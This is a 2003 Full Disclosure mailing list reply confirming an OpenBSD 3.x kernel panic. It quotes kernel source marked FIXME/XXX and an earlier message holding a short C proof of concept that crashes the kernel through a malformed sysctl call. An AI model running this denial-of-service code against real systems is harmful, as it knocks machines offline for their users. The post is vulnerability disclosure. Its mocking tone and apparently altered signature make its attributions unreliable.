Full Disclosure mailing list archives
Re: OpenBSD kernel panic, yet still O*BSD much worse than MS-DoS 6.0
From: noir () uberhax0r net
Date: Thu, 20 Nov 2003 16:58:57 -0500 (EST)
i can confirm this SECURITY vulnerability on all openbsd 3.x. so apperantly searching for "XXX" and/or "FIXME" strings in obsd kernel is a guaranteed way to locate a ring 0 vulnerability ... nice, real nice ;P some examples; char buf[128], *bufp; /* FIXME */ int len = sh.s_size, path_index, entry_len; /* DPRINTF(("COFF shlib size %d offset %d\n", sh.s_size, sh.s_scnptr)); */ error = vn_rdwr(UIO_READ, epp->ep_vp, (caddr_t) buf, len, sh.s_scnptr, ... /* * vslock: wire user memory for I/O * * - called from physio and sys___sysctl * - XXXCDC: consider nuking this (or making it a macro?) */ void uvm_vsunlock(p, addr, len) struct proc *p; caddr_t addr; size_t len; { uvm_fault_unwire(&p->p_vmspace->vm_map, trunc_page((vaddr_t)addr), round_page((vaddr_t)addr + len)); } grep -rn or cscope is your friend ;) On Wed, 19 Nov 2003 crispin () immunix com wrote:
ppl think "hey, local DoS sucks", therefore they are. i think "hey, obsd sucks", therefore i am. #include <stdio.h> #include <sys/param.h> #include <sys/sysctl.h> int main () { unsigned int blah[2] = { CTL_KERN, 0 }, addr = -4096 + 1; return (sysctl (blah, 2, (void *) addr, &blah[1], 0, 0)); } it's wide, it's opened, it's surely obsd! -- Crispin Coward, Ph.D. http://immunix.com/~crispin/ Chief Scientist, Immunix http://immunix.com http://www.immunix.com/tosell/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- OpenBSD kernel panic, yet still O*BSD much worse than MS-DoS 6.0 crispin (Nov 19)
- Re: OpenBSD kernel panic, yet still O*BSD much worse than MS-DoS 6.0 Chris Ruvolo (Nov 20)
- Re: OpenBSD kernel panic, yet still O*BSD much worse than MS-DoS 6.0 noir (Nov 20)
- <Possible follow-ups>
- Re: OpenBSD kernel panic, yet still O*BSD much worse than MS-DoS 6.0 Crispin Cowan (Nov 19)
- Re: OpenBSD kernel panic, yet still O*BSD much worse than MS-DoS 6.0 Crispin Cowan (Nov 20)